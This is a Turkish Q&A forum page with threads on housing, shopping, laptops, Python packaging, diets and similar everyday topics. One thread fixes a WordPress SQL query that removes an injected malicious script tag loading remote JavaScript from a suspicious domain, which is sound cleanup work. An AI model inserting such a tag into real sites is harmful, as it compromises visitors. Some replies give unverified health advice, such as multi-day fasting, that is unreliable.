31 yaş üzeri yazan ilanlarda binanın kentsel dönüşüme girip girmeyeceğini nasıl anlayabilirim? Önümüzdeki 2-3 yılda kentsel dönüşüme girecek bi ev almak bulmak için ne yapmam lazım?
0
mg3929
(05.09.20)
Kentsel dönüşüm kararı verilmiş, imzaları atılmış ve konut sakinleri binadan yıkım kararıyla tahliye edildiyse 2-3 sene içinde bi itiraz olmazsa %90 ihtimalle yıkılıp yenisi yapılmış oluyor. Ancak bunun bile bir garantisi yok, itirazlarla vs bu süre uzayabiliyor. Onun dışındaki hiç bir şeyin %100 garantisi var diyemeyiz, eyüpte yıkılmak üzere olan bir evimizden adamları tahliye ettikten 2-3 yıl sonra bile hala kazma vurmamışlardı, yeri geliyor müteahht ben battım yapamicam diyor, vs v.s
0
roket adam
(05.09.20)
mahallenin cevval emlakçısına danışın.
belediyenin emlak işlerine sorun.
daha önce yan mahallelerde dönüşüm başlamış mı bi bakın.
0
ankarakecisi
(05.09.20)
öyle bir daire bulamazsınız. çünkü kentsel dönüşüm 8-9 yıllık bir süreç. satılan evler genellikle kentsel dönüşüme girmesi uzun sürecek daireler. önümüzdeki 2-3 yılda kentsel dönüşüme girecek evlerin sahipleri de zaten evlerini satmazlar.
0
tururo
(05.09.20)
Kentsel nödüşüme girip girmeyeceği önemli değil, önemli olan yeni imar ile ne kadar kazanım alacağı. Mesela;

hali hazırda binada 100 m2 10 daire vardır, zamanında imar mimar hak getire yalap şap yapılmıştır.

Şimdi yıkılıp yapılsa o arsaya verilecek imar izni hem 10 daire sahibine birer daire verebilecek, hem de imalat maliyetini çıkaracak için satılacak bi 8-10 daire daha fazladan çıkarmak gerekecek kadar olmalı.

Yani binayı yıkıp yeniden yapsak tekrar 10 daire yapabiliyorsak kentsel dönüşümden yararlanıp bir müteahhite yaptırmak pek mümkün değil.

Ancak arsa sahipleri cebinden maliyeti öderse olabilir, ya da duruma göre maliyetin yarısını veya hesaba göre başka bir oranı ödeyerek.

Her bina için, her arsa için, her sokak için ayrı ayrı hesaplanır bu işler, tek bir cevabı olamaz herkese verilecek.
0
John Bloor
(07.09.20)
(4)

Sanal market yerleri sorunu

Sanal market sitelerinin birinde dükkanınız var.Sipariş geldi. Ürünü yolladık. Müşteri de bana ürün gelmedi diyip onaylamazsa veya siteye bir bildirimde bulunursa noluyor?Veya tam tersi satıcı kişi ürünü göndermeyip göndermiş gibi yaparsa, müşteri parasını nasıl geri alıyor?
Sanal market sitelerinin birinde dükkanınız var.
Sipariş geldi. Ürünü yolladık.
Müşteri de bana ürün gelmedi diyip onaylamazsa veya siteye bir bildirimde
bulunursa noluyor?

Veya tam tersi satıcı kişi ürünü göndermeyip göndermiş gibi yaparsa, müşteri parasını nasıl geri alıyor?
0
(05.09.20)
Sisteme kargo numarasi girilmesi gerekiyor surecin ilerlemesi icin.

Musteri kargoyu almadim derse kargo firmasinin teslim tutanagina bakilir. Oradan teslim alip almadigi belli olur zaten. Tam tersi icin de gonderi takip nodan firmanin kargoyu kime gonderdigine bakilip olay aydinlatilir.
0
brkylmz
(05.09.20)
Ama diyelim satıcı kargo gönderdi ve içine salatalık koydu.
Egzajere ediyorum. Çakma ürüm yolladı veya...
Bu durumda noluyor?
0
🌸
(05.09.20)
Teoride kargo teslim alınırken içerik kontrol ediliyor. Hatalı veya hasarlı bir şey varsa tutanak tutuluyor. Ancak pratikte kargocular teslim etmeden kutuyu açmanıza izin vermiyorlar. Haliyle ürünü almış bulunuyorsunuz.

Bu durumda da satıcının sayfasına, "x aldım ama salatalık gönderdi." diye yorum yazıyorsunuz. İnsanlar da o marketten bir şey satın almıyor ya da Tekrarı çok ise / kanıtlanabilirse kişi siteden banlanıyor. Haliyle satıcı bindiği dalı kesmiş oluyor. Bundan dolayı da böyle çakallıklara en başından girilmiyor. (Yorumların kolayca silinebildiği Instagram gibi sayfalar hariç, oradakiler de şeffaf ambalaj ile kapıda ödemeli gönderim yapacaklarını taahhüt ediyorlar. Ambalaj şeffaf değilse almıyorsunuz.)

Ancak çakma ürün satan hala var. Yorumlarda da yazıyor yine zaten. Ama belki bana kıyak geçer orijinal gönderir diye ya da baştan ürünün çakmasına razı gelerek aynı ürünü aynı yerden sipariş veren insanlar oluyor. Ben bu tür çakma ürün satanlara bir yaptırım yapıldığına da denk gelmedim açıkçası.

Kısacası yorumlara bakıp, dolandırılma riskini azaltmaya çalışarak alışveriş yapıyor insanlar.
0
diyanet takvimi
(05.09.20)
Diyanet takvimi demis ya yorum falan diye. O yuzden hayvan gibi yuksek satis ve pozitif yorumu olan magazalardan alisveris yapman lazim. O kadar degerlendirme almak kolay degil. Cakmacilar birkac bin satis yaptigi hesabi dukkani kapatir baska acar.

Ha salatalik konusu direkt dava konusu. Mesela gittigidiyordan bir sey aldim yanlis urun gondermisler iade ettim kargo no girdim. Saticinin tek yetkisi onay vermek buna eger kargo teslim edilmisse. Onun icin de toplam 4 gun mu ne sure var onay vermezse de otomatik sistem bana parami iade ediyor. Yani adama salatalik yollasaydim da parami alirdim. Ha sonrasi iste dava mava anca
0
proletarier aller lander vereinigt euch
(05.09.20)
(6)

7000tl bütçeyle Lenovo mu Dell mi?

tiyamin
Öğretmenim, malum evden eğitim devam edecek, canl dersler için yeni laptop şart oldu, eskisi 12 yılı devirdi. Lenovo Yoga dokunmatik bişey düşünüyordum ama air bar diye bir zımbırtı varmış, işimi görür, fazladan 3-4 bine gerek yok. Beni uzun süre idare etsin istiyorum. Oyun oynamam, ancak film izler
Öğretmenim, malum evden eğitim devam edecek, canl dersler için yeni laptop şart oldu, eskisi 12 yılı devirdi.
Lenovo Yoga dokunmatik bişey düşünüyordum ama air bar diye bir zımbırtı varmış, işimi görür, fazladan 3-4 bine gerek yok. Beni uzun süre idare etsin istiyorum. Oyun oynamam, ancak film izlerim en fazla.

İkisinin de fiyatı aynı gibi. Lenovo thinkpad, thinkbook 400-500 TL fark ediyor, gerekli mi değer mi?
Linkleri aşağıya bırakıyorum. İkisinin hakkında da kullanıcı yorumu pek yok. Oylarınıza sunuyorum:

Lenovo 15 Intel Core i7 1065G7 16GB 1TB + 512GB SSD Freedos 15.6" FHD Taşınabilir Bilgisayar 20SM003ATX10

(git: www.hepsiburada.com

Dell Inspiron 3593 Intel Core i7 1065G7 16GB 512GB SSD MX230 Freedos 15.6'' FHD Taşınabilir Bilgisayar FB65F165C

(git: www.hepsiburada.com
0
tiyamin
(05.09.20)
hocam eski laptopu bir yaz
belki rami yükseltir ssd takar kullanırsın
paran dursun
0
kingcyrax
(05.09.20)
Lenovo thinkpadi, garanti süresi bittikten sonra serviste tamir ettiremezsin. Bana sıfırı kadar fiyat verdiler. Genelde kurumsal çalıştıkları için bireysel müşteriyi umursamıyorlar.
0
Piukh
(05.09.20)
@kingcyrax iki kez yükselttik RAM'i ama çok donma, takılma ve mütamediyen baş ağrıtıcı dozda ses yapıyor. Acer idi markası.
0
🌸tiyamin
(05.09.20)
Dell al, ardına bakma. Satış sonrası himetleri çok çok iyi. Lenovo, laptoplarda garantili servis için sadece istanbulda iletişim kurup kargo ile gönderi yapılabilen bir yetkili servis sunarken, Dell yetkili servis ağına sahip.

BU rada ne alacaksan bir an önce al ki her geçen gün fiyatlar uçuyor. Birkaç ay önce bunların fiyatları 5000-5500 bandındaydı.
0
foolrules
(05.09.20)
tiyamin
islemcinin macununu yenilettir
ve
lütfen 240 gb bir ssd al tak
göreceksin hayat kurtaracak
yeni aldıgın pc ye takarsın en kotu
0
kingcyrax
(05.09.20)
hocam cok temiz ikinci el thinkpadler var piyasada, istersen onlara bak. uretim yili 2016-2017 olsun, sikinti cikmaz. ram'i azsa ram'ini arttir, hafizasi azsa ssd takarsin. bu paylastigin iki cihaz da 2-3 yil sonra sorun vermeye baslar.
0
ubi dubium ibi libertas
(05.09.20)
(2)

Cep telefonu tavsiyesi

kanepeee
Aslında 2500 liraya kadar bakıyordum ama anladığım kadarıyla belki de 4000'e kadar çıkmam gerekecek. Hem ucuz hem de uzun yıllar idare edecek bir şey olursa süper olur.Çok fotoğraf çekmem, mükemmel kamera olmasına gerek yok. Pek oyun da oynamıyorum. Videolarda, webde, müzik dinlerken takılmasın; ve
Aslında 2500 liraya kadar bakıyordum ama anladığım kadarıyla belki de 4000'e kadar çıkmam gerekecek. Hem ucuz hem de uzun yıllar idare edecek bir şey olursa süper olur.

Çok fotoğraf çekmem, mükemmel kamera olmasına gerek yok. Pek oyun da oynamıyorum. Videolarda, webde, müzik dinlerken takılmasın; ve en önemlisi kronik sorun olmasın.

Aslında xiaomi redmi note 9/9s/pro falan güzel gibiydi ama onların kamerasına çok toz kaçıyormuş, herkes iade etmek istiyormuş.
0
kanepeee
(05.09.20)
Samsung a71, şurada biraz daha uzun yazmıştım, şunu da ekleyeyim telefon içinde android 10 ile geliyor, android 11 ve 12 alacağı da samsung tarafından açıklandı

www.eksiduyuru.com
0
freebird5406_2
(05.09.20)
ben realme 6 pro almayı düşünüyorum. bi inceleyin derim.
0
jugador
(05.09.20)
(4)

Kağıt bardak aslında plastik mi?

ya ben lan neyse
kağıt zararsızdır diye çay falan içiyoruz ama baya naylon var içinde? ne farkı kaldı plastik bardaktan?
kağıt zararsızdır diye çay falan içiyoruz ama baya naylon var içinde? ne farkı kaldı plastik bardaktan?
0
ya ben lan neyse
(05.09.20)
karton bardak diye bildigimiz bardaklarin ic tarafinda cok ince zar var ve evet plastik. o yuzden kahve zincirine gittigimde kupada aliyordum sicak icecegimi (pandemiden once)

aslinda tek kullanimlik hic bir bardagi sicak icecek icin kullanmamak lazim. soguk su icilebilir ama cay no!
0
exlibris
(05.09.20)
sıvı konulduğunda ıslanmaması ve sağlam olması için selefon kaplı diye biliyorum
0
Yalcin
(05.09.20)
Ben tesadüf üretim yerini gördüm, hani uzun poşet içinde olur ya birine bardak vereceksek o poşetten tutup ay senin bardağına dokunmıyım sen kendi elinle al deriz. O işte çok gereksizmiş, çünkü el değmeden üretilmiyor.
0
ykyt
(05.09.20)
Teflon tavada kullanılan çok çok zararlı bi çeşit madde ile kaplı
0
photo85
(05.09.20)
(2)

Fantom Dikey Süpürge

vizivozo
Almayı düşünüyorum. Şu ikisi arasındaki farkı bilen var mı? birisinde toz torbası var diyorlar ama ikisinde de yok sanki.https://www.hepsiburada.com/fantom-p-1200-pratic-kirmizi-kuru-supurge-p-EVFANPRAP1200https://www.hepsiburada.com/fantom-speedy-du2000-500w-dikey-elektrikli-supurge-p-EVFANSPEEDY20
Almayı düşünüyorum. Şu ikisi arasındaki farkı bilen var mı? birisinde toz torbası var diyorlar ama ikisinde de yok sanki.
www.hepsiburada.com
www.hepsiburada.com
0
vizivozo
(05.09.20)
kendi sitelerinde inceledim hic bir fark goremedim. keriz silkeleme gibi geldi. ucuz olanini alabilirsin

www.fanset.com

www.fanset.com

bu arada bizde kirmizi olani vardi, torbasiz diyor ama motor uzerinde kece gibi bir torba vardi, sanirim filtresiydi onu da yikamak gerekiyor. evi dip bucak temizlemek icin degil de, ekmek kirintilariini falan toplamak icin kullanilir, bir sure sonra (cok bastirarak kullanirsaniz) borusu kenarindan kiriliyor
0
exlibris
(05.09.20)
bende de eski bir modeli vardı. kolay dağılıyor çürük falan ama çok pratik bişey :)
0
🌸vizivozo
(05.09.20)
(8)

Iphone kiri pası nasıl temizlioz?

tchuck
direkt soru ekte aslında.
direkt soru ekte aslında.
0
tchuck
(05.09.20)
Elektrik süpürgesiyle emiklerim ben olsam, çünkü bişeyle kurcalasan içe kaçar iyice.
0
John Bloor
(05.09.20)
Ben çok hassas olmak şartıyla iğneyle temizliyorum.
0
irene
(05.09.20)
ben de sormustum ayni soruyu

patafix onermislerdi, boyle ciklet gibi olan yapiskanlar var ya, onu sokup yapistigi kadar kiri alabilirsin demislerdi.
0
exlibris
(05.09.20)
benim öğrenciler alıp iğnenin veya kürdanın ucuna kolonya ile ıslattıkları kağıdı (havlu kağıt veya peçete) dolayarak, dikkatlice temizliyorlar sağ olsunlar :D
0
invictae
(05.09.20)
Eski dis fircasi hoparlor ve mikrofon delikleri icin. Sarj deligi icin de kurdan. Hatta ahize icin de dis fircasi oneririm biraz kolonyalanmis. Ses kalitesini arttiriyor resmen.
0
proletarier aller lander vereinigt euch
(05.09.20)
patafix + isopropil alkole batırılmış kulak çubuğu.
0
orient blue
(05.09.20)
Patafix dışıdnda başka birşeye ihtiyacın yok. İğne, kulak çöpü ya da kürdan zarar verme olasılığını çok artırır.
0
foolrules
(05.09.20)
istanbuldaysaniz Apple Store'a goturunce ucretsiz temizliyorlar. orasini burasini delince patlak hoparlore maruz kalmayin.
0
yoggi
(05.09.20)
(1)

fedex kargomu aras'a teslim etmiş ve.......

Stoneface
los angeles'tan gelen kargoyu fedex aras'a teslim etmiş. haberim yok. sitelerinde böyle bilgi de yok. adamların sitesinde takip ettigimden hala merkezlerinde duruyordu paket. adamları aradım, "aras getirecek size buyrun takip no" dediler. takip no ile kontrol ettim, aras kargoyu "getirmiş" beni bul
los angeles'tan gelen kargoyu fedex aras'a teslim etmiş. haberim yok. sitelerinde böyle bilgi de yok. adamların sitesinde takip ettigimden hala merkezlerinde duruyordu paket. adamları aradım, "aras getirecek size buyrun takip no" dediler. takip no ile kontrol ettim, aras kargoyu "getirmiş" beni bulamayınca da geri göndermiş. şimdi kargo abd'ye geri mi dönüyor? tekrar getirilme gibi bir şans olamaz mı? 250$'lık paket.
0
Stoneface
(05.09.20)
geri gitmez, aras kargonun subesine gider. Tekrar denerler ya da mesaj atarlar ararlar sizi

Siz arayin randevu verin ya da subeden gidip teslim alin.
0
oscar
(05.09.20)
(5)

Evde spor yapmak zorunda olunca...

AlsterWasser
Sporu eve taşımak zorunda kalan arkadaşlar.nasıl bir ekipman alışverişi yaptınız neler tavsiye edersiniz? evde spor yapmak verimsiz gerçekten bunun farkındayım ama malum ve esktra sebeplerden bu işi eve taşımak zorundayım ama minimum maliyetle vasat seviyede de olsa bir şeyler yapmak istiyorum. tecr
Sporu eve taşımak zorunda kalan arkadaşlar.

nasıl bir ekipman alışverişi yaptınız neler tavsiye edersiniz?


evde spor yapmak verimsiz gerçekten bunun farkındayım ama malum ve esktra sebeplerden bu işi eve taşımak zorundayım ama minimum maliyetle vasat seviyede de olsa bir şeyler yapmak istiyorum.

tecrübe ve önerilerinize açığım.
0
AlsterWasser
(05.09.20)
Vücut ağırlığı=Sıfır maliyet. Vücut ağırlığınla kas gruplarının çoğunu çalıştırabilirsin. Biraz ekipmanım olsun dersen bir çift dumbbell alıp ekstra gerilim katabilirsin. Fakat bu çalışmaların hiçbiri ileri götürmez; geri gitmeni engellemeye çalışır.
0
angelus
(05.09.20)
Yoo hiç verimsiz değil. Programi, ihtiyacinizi belirleyin ona gore uygulamaya gecin ben daha cok verim aldim aksine.

Bar + dumbell aldim. Ip alixam atlama icin. Pilates bandim var. matim var. yetiyor bana.
0
bradshaw
(05.09.20)
bu mevzularda genel fikir 1>0 dır. bayadır boşladıysan vücut ağırlığınla başlayıp sonra bench, dumbell, z bar belirli miktar ağırlıkla da ekipmanı kurarsın. ayakta 50 kg ohp yapıyorsan, oturarak 30 kg da denersin. evde spora verimsiz demek biraz acımasızca olur, pandemi sürecinde salondan eve geçip kısıtlı ekipmanla çok iyi form yakalayan ve bundan keyif alan onca insana denk geldim.
0
Barbell
(05.09.20)
50cmlik barlar aldım. 15 liraya 50 kg çimento, 10 liraya 30 kilo kum aldım. Plakaları kendim yaptım. Bir barda 25 kgya kadar takacak yer var. Sonrası için duruma göre bakıcam.
0
black mamba
(05.09.20)
Dumbell ve barfiks için kapı aparatı bana yeterli oluyor.
0
Piukh
(05.09.20)
(2)

bir taşınma tavsiyenizi alırım (istanbul anadolu yakası)

calucifer
ahali selam. kartal, pendik veya tuzla'ya taşınmayı düşünüyorum. sadece düşünüyorum bu arada... kesin yapacağım diye bir şey yok. merak edenler için sebepleri aşağı bırakacağım ama genel olarak merak ettiğim şunlar: 1) bu 3 ilçede yaşayanlar, hangi bölgeleri tavsiye eder? e5 ile deniz arasında kalan
ahali selam. kartal, pendik veya tuzla'ya taşınmayı düşünüyorum. sadece düşünüyorum bu arada... kesin yapacağım diye bir şey yok.

merak edenler için sebepleri aşağı bırakacağım ama genel olarak merak ettiğim şunlar:

1) bu 3 ilçede yaşayanlar, hangi bölgeleri tavsiye eder? e5 ile deniz arasında kalan kısımlar, mümkünse metro - marmaray'a yakın kısımlar iyidir diye düşünüyorum. doğru mu düşünüyorum? uzak dur dediğiniz semtler var mıdır? mesela kartal'da atalar mahallesi diye bir yer var. kiralar uygun gözüküyor ama berbat bir yer midir? bunun gibi bol olaylı belalı semtler varsa paylaşırsanız sevinirim.

2) iş hayatım gebze'ye haftada bir iki defa gitmek, arada sırada ataşehir'de ofise gitmek ya da evden çalışmak şeklinde olacak. yani marmaray - metro kullanacağım (arabam yok). sabah saatlerinde marmaray ve metro doluluk oranları nasıl sizce? balık istifi gibi bir durum var mı?

----- merak edenler için neden bu bölgeye taşınmak istiyorum -----

ekonomik sebepler: koronavirüs sebebiyle ekonomi beter halde ve düzelecek gibi değil. daha uygun bir kira vereceğim sakin bir yer arayışındayım. daha az aidat vereceğim 2+1/3+1 bir ev makul olur düşüncesindeyim. şu an 1+1 bir evdeyim ve aidat yüksek...

deprem: Silivri fayından ne kadar uzak olursam o kadar iyi diye düşünüyorum. 99'da körfez bölgesi büyük rahatladığı için risk o taraflarda az artık. zemin yapısı da avrupa yakasının geneline göre daha sağlam.

nalet olası covid19: artık çok daha fazla evdeyiz ve 2021'in ortalarına kadar aşı gelmeyecek - ki o aşı gelecek de bize yapacaklar da işe yarayacak da... ölme eşeğim, please dont die :( bu kış vakaların deli gibi artacağını şuraya not ediyorum. kötü günler göreceğiz. yani o yüzden merkez ve yoğun yerlerde oturmak mantıklı gelmiyor.
0
calucifer
(05.09.20)
Üçü için de e5'in üst kısmı biraz daha düşük gelir grubunun yaşadığı alanlar. Bunun yansımaları tabii ki sadece ekonomik olmuyor. Yolun altı daha çok beyaz yaka orta sınıf insanlar için.

Burada e5 üstü için bir istisna var: Dumankaya gibi büyük siteler. Buralarda genelde karışan görüşen olmaz ama arada tabii ki kavgalar, gürültüler çıkar balkondan duyarsın.
0
Piukh
(05.09.20)
tuzla için konuşuyorum, taşınmayın. çok uzak. çoook uzak. hem km cinsinden uzak, hem de diğer semtler ile yol bağlantıları çok zayıf ve bol trafikli. ayrıca tuzlanın güzel kısmı eskiden sahil tarafı ve mercan idi - idi diyorum çünkü son birkaç yılda her iki yer de çok rezil bir hale büründü. ha bu arada kiralar da pek uygun sayılmaz. bence pendik ya da kartala bakın.
0
semyasa
(06.09.20)
(3)

Bir Video Arıyorum (Satış Yapan Köylü Kadınlara "Sefil" Diyen Teyze)

brkylmz
Turistik gezi için gittiği yerde satış yapan kadınlardan başlayıp, dağlara taşlara kadar aşağılayan kadının videosunu arıyorum?- muhtelif kelimelerle arama yaptım ama bulamadım.
Turistik gezi için gittiği yerde satış yapan kadınlardan başlayıp, dağlara taşlara kadar aşağılayan kadının videosunu arıyorum?

- muhtelif kelimelerle arama yaptım ama bulamadım.
0
brkylmz
(05.09.20)
youtu.be bezirgan sırıtışı ile arattim :)
0
palpasyon
(05.09.20)
bu cakma elitlerin de ust perdeden atip tutmasi kadar mide bulandirici birsey yok ya harbiden...
0
cooperr
(05.09.20)
Ahahaha hay yasa hocam
0
🌸brkylmz
(05.09.20)
(3)

python dependency problemleri

roket adam
Abiler, ben ıvır zıvır py işleri yapıyorum bu ara, hoşuma da gidiyor. Ancak çözemediğim şöyle bi sıkıntım var.Kendi Mac'imde, pycharm üzerinde geliştiriyorum. Dışarıdan bir modül almam gerekirse pycharm konsolundan "pip install requests" diyerek mesela o modülü yükleyebiliyorum. Amma velakin aynı sc
Abiler, ben ıvır zıvır py işleri yapıyorum bu ara, hoşuma da gidiyor. Ancak çözemediğim şöyle bi sıkıntım var.

Kendi Mac'imde, pycharm üzerinde geliştiriyorum. Dışarıdan bir modül almam gerekirse pycharm konsolundan "pip install requests" diyerek mesela o modülü yükleyebiliyorum. Amma velakin aynı scripti dayının biri indirip denemek istediğinde, kendi sanal ortamını oluşturup teker teker bu modülleri yüklemesi lazım. Üstüne üstlük, işin içerisine farklı py versiyonları ve farklı dependency versiyonları da eklenince olay çok karışıyor. Mesela ben requests'in 1.3.5 versiyonuna göre kodu yazmışım, 1.3.6'da bir şeyler değişmiş son sürümü çekince kod çalışmıyor. Aynı durum py için de geçerli, halen neden python 2 ve 3 ayrı ayrı sürüm olarak mevcut kullanılıyor ve aralarında bu kadar major farklılıklar var anlayamıyorum.

Siz bu işi nasıl çözüyorsunuz? Öyle bir şey istiyorum ki dayı kodu github'ımdan indirip çalıştırdığında, tüm dependency'ler ya indirilen kodumun içinde olsun, ya da o zamanki versiyonlar ile otomatikman kurulsun. Bu işin içinden çıkamadım, bazı yöntemler var görünüyor ama bir de sizlere sorayım dedim. Tenks e lot.
0
roket adam
(05.09.20)
Benim gördüğüm açıklama kısımında dependency listesi veya direkt konsola girilecek halde komut bırakıyorlar. Mesela "pip install -U catkin_pkg cryptography empy ifcfg lark-parser lxml netifaces numpy opencv-python pyparsing pyyaml setuptools"
0
reactionic
(05.09.20)
Cevap şuymuş arkadaşlar, pipenv oluşturup tüm işi bitirdikten sonra

pip freeze > req.txt yapıyorsunuz, o txt dosyasının içine tüm dependency'leri versiyonları ile beraber yazıyormuş.
0
🌸roket adam
(06.09.20)
requirements.txt icin suna bakabilirsiniz - note.nkmk.me

bir de virtualenv var konu ile ilgili faydali olabilir

packaging.python.org
0
kolonyaa
(06.09.20)
(2)

Bu sql sorgusundaki hata nedir?

winston
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='scripts.lowerbeforwarden.ml type='text/javascript'></script>”, ""));


#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'src='scripts.lowerbeforwarden.ml type='text/javascript'></' at line 1 hatası alıyorum
0
winston
(05.09.20)
' ' işaretleri sorunlu gibi
src='scripts.lowerbeforwarden.ml kısmına bakın.
0
ycaycayca
(05.09.20)
tek tırnak olan yerleri çift, çift olan yerleri tek yapsanız sorun kalmayacak aslında.

REPLACE (
post_content,
'< script src = "scripts.lowerbeforwarden.ml" type="text / javascript"></script>',''
)
0
biseysorcaktim
(05.09.20)
(5)

0 Antrenman ve yağ yakma

lata
arkadaşlar soru çok basit. ben yağ yakmak istiyorum vücudumun yağ oranından mutlu değilim (1.82 ye 81 kilo) yediklerimi söyliyimöğlen 3 yumurta+hindi füme+ peynirli omletakşam bir gün protein ağırlıklı besinler (tavuk gögüs köfte vs) ama yanında da bazen pilav. bi gün de bakliyat vb. bu kadar.ben ne
arkadaşlar soru çok basit. ben yağ yakmak istiyorum vücudumun yağ oranından mutlu değilim (1.82 ye 81 kilo) yediklerimi söyliyim

öğlen 3 yumurta+hindi füme+ peynirli omlet
akşam bir gün protein ağırlıklı besinler (tavuk gögüs köfte vs) ama yanında da bazen pilav. bi gün de bakliyat vb. bu kadar.

ben neyi değiştireyim de vücudumda yağ oranı azalsın? nokta atışı tavsiye varsa sevinirim. direk şunu ye şunu yeme derseniz süper olur.

antrenman yapmak istemiyorum, seçenek dışı.
0
lata
(05.09.20)
Bi şey değiştirmene gerek yok, mevcut hareket durumuna göre TDEE skorunu hesapla ondan 200-300 kalori açık ver yağ yakarsın, yağ yakımı ne yediğinle alakalı değil ne kadar yediğinle alakalı bir durum.
0
angelus
(05.09.20)
Extended/prolonged fasting denilen +24 saat oruçlari sıklıkla yaparsan faydalı olabilir, her hafta başlangıcında +24-48-72 saat oruç tavsiye ederim. Birileri şimdi gelir ketojenik diyet yap der ama onu baya araştırıp hesaplama yapman ve yediklerini baya değiştirmen gerekiyor, benim dediğim daha basit uzun süreli açlık, sadece su çay kahve şekersiz... Yaz ayları terleme sebebiyle günlük 2-5 Gr tuz alırsan da iyi olur.
0
candanag
(05.09.20)
hocam 24 saat oruca tövbe ailem izin vermez:) onlarla yaşadığım için klasik aile kafası kahvaltı etmiyim diyince olur mu öyle şey diyolar:) yeni yeni onları alıştırdım kahvaltı etmemeye de.
0
🌸lata
(05.09.20)
Ben diyetisyene gidiyorum, dizimde sorun var bütün gün evdeyim yürüyemiyorum bile. 1 haftalığına Keto diyet + if verdi. Gerçekten çok zor ama bir haftada 2.5 kilo verdim yağdan.
0
jazzabel
(05.09.20)
Oturarak yaptığın her seyi ayakta yap bak nasil eriyor
0
tomwaitsforme
(05.09.20)
(2)

Güzel ve serin cumartesi nereye gitmeli?

solenkol
Bugün yeme turu yapalım dedik. Eminönü NuruosmaniyeDe Dürümcü Mehmet ilk durak, üstüne de bena dondurmacısından tatlı ve dondurmayla günü kapayalım diyoruz. ( Not alın bu yerleri bence:) ) o taraftayken biraz da yürüyelm dedik ama nerelere ugrasak da yediklerimizi eritsek? Kapalı çarşı fln çok kala
Bugün yeme turu yapalım dedik. Eminönü NuruosmaniyeDe Dürümcü Mehmet ilk durak, üstüne de bena dondurmacısından tatlı ve dondurmayla günü kapayalım diyoruz. ( Not alın bu yerleri bence:) ) o taraftayken biraz da yürüyelm dedik ama nerelere ugrasak da yediklerimizi eritsek? Kapalı çarşı fln çok kalabalıktır girmeyiz.
0
solenkol
(05.09.20)
balkapanı han'a bir uğrayın derim. bir de rüstem paşa camii. mimar olarak aklıma gelenler ve çoğu kimsenin bilmediği yerler.
0
xrated
(05.09.20)
ben olsam sultanahmetten asagı basıp eminonu'ne geçerim. kadıköye gitmeli boğaz turu yaparım. sonra kadıköy rıhtımı üstünde boğaz manzaralı istanbul kitapçısında çay keyfi. sonra akşamı karaköy vapuruyla karşıya geçip 3. dalga kahvecilerden birinde günü kapatırım.
0
buenosdias
(05.09.20)
(3)

Mil özellikli kredi kartı alayım mı?

loser blueser
Ayda 2 kez yurt içi gidiş-dönüş uçan biri olarak mil özellikli kart almak mantıklı mı? Örneğin 1 sene sonunda şehir içi 1 uçuşa yetecek mil kazanılır mı tahminen?
Ayda 2 kez yurt içi gidiş-dönüş uçan biri olarak mil özellikli kart almak mantıklı mı? Örneğin 1 sene sonunda şehir içi 1 uçuşa yetecek mil kazanılır mı tahminen?
0
loser blueser
(05.09.20)
Aylık harcamanıza bağlı, eskisi kadar çok mil vermiyor artık kartlar. Ayda ortalama 5-6bin harcar, kampanyaları da takip ederseniz yılda bir yurtiçi uçuşa yeter bence.
0
orient blue
(05.09.20)
Sadece uçuş değil ne kadar harcadığın da önemli.
0
kumulatifvergimatrahi
(05.09.20)
Çok az mil veriyorlar.
0
mirafiori
(05.09.20)
(3)

Enteresan poscast'ler

yarey
Çalışırken çok sıkılıyorum, dinlettikce dinlettiren, vaktin gectigini hissettirmeyen podcast önerilerinizi alırım.İngilizce olursa daha iyiTesekkurler
Çalışırken çok sıkılıyorum, dinlettikce dinlettiren, vaktin gectigini hissettirmeyen podcast önerilerinizi alırım.
İngilizce olursa daha iyi
Tesekkurler
0
yarey
(05.09.20)
Other people's lives
0
freebird5406_2
(05.09.20)
Fularsiz entellik
0
tomwaitsforme
(05.09.20)
Nilay Örnek ~ Nasıl Olunur
0
since1907
(06.09.20)
(1)

Adonis Kası

üç gün gündüz
Nedir bu kas, nasıl sahip olabiliriz tam olarak?
Nedir bu kas, nasıl sahip olabiliriz tam olarak?
0
üç gün gündüz
(05.09.20)
sahipsiniz zaten. sadece yağ oranınız yüzünden göremiyoruz kendilerini. yağları yakın hepsi çıkar meydana.
0
bohr atom modeli
(05.09.20)
(4)

Çevremde corona vakaları arttı

mg3929
Eskiden hiç birebir tanıdığım corona vakası yoktu, şimdi acayip artmış durumda. Bugün de bi arkadaşımın babası vefat etmiş. Sizce durum söylenenden kötü mü?
Eskiden hiç birebir tanıdığım corona vakası yoktu, şimdi acayip artmış durumda. Bugün de bi arkadaşımın babası vefat etmiş. Sizce durum söylenenden kötü mü?
0
mg3929
(05.09.20)
Mart-nisan ayında çevremde çok fazla vaka duyuyordum. Haziran ve temmuzda duymadım. Şimdi yine tanıdığım bir on kişi vardır pozitif olan. Kötüyse de değilse de yapacak bir şey yok. AVM, kafe, kütüphane kapatma, sokağa çıkma yasağı gibi büyük çaplı tedbirlerin tekrar geleceğini düşünmüyorum. Kamuda esnek çalışma izni çıktı ve üniversitelerin büyük bir çoğunluğu açılmayacak sanırım, bunlar dışında önlem beklemiyorum. Kendi önlemimizi almaya devam her zamanki gibi.
0
black holes in the sky
(05.09.20)
Benim de birinci derece çevremde korona vakaları çıkmaya başladı. Ciddi ciddi görüştüğüm insanlar yani. Dolayısıyla evet biz eski karantina moduna geri döndük.
0
roket adam
(05.09.20)
arttı.
0
sutlu nescafe
(05.09.20)
Günlük sayının sonuna bi 0 ekleyin bence
0
photo85
(05.09.20)
(1)

apple kulaklık fiyatı

patronaj
selamlar. internette, Apple'ın kendi sitesinde, trendyolda, teknosada vs 3.5 mm jaklı EarPods fiyatı 279 tl iken banabi'de orijinal olup kvk garantilidir denen ürün 189 tl.Arada 100 lira olunca şüphelendim. alan kullanan var mı? acil kulaklık lazım da:/
selamlar. internette, Apple'ın kendi sitesinde, trendyolda, teknosada vs 3.5 mm jaklı EarPods fiyatı 279 tl iken banabi'de orijinal olup kvk garantilidir denen ürün 189 tl.

Arada 100 lira olunca şüphelendim. alan kullanan var mı? acil kulaklık lazım da:/
0
patronaj
(05.09.20)
Orijinal diyorsa ve markası da applesa sorun olmaz banabi çakma mal satmaz herhalde
0
tomwaitsforme
(05.09.20)
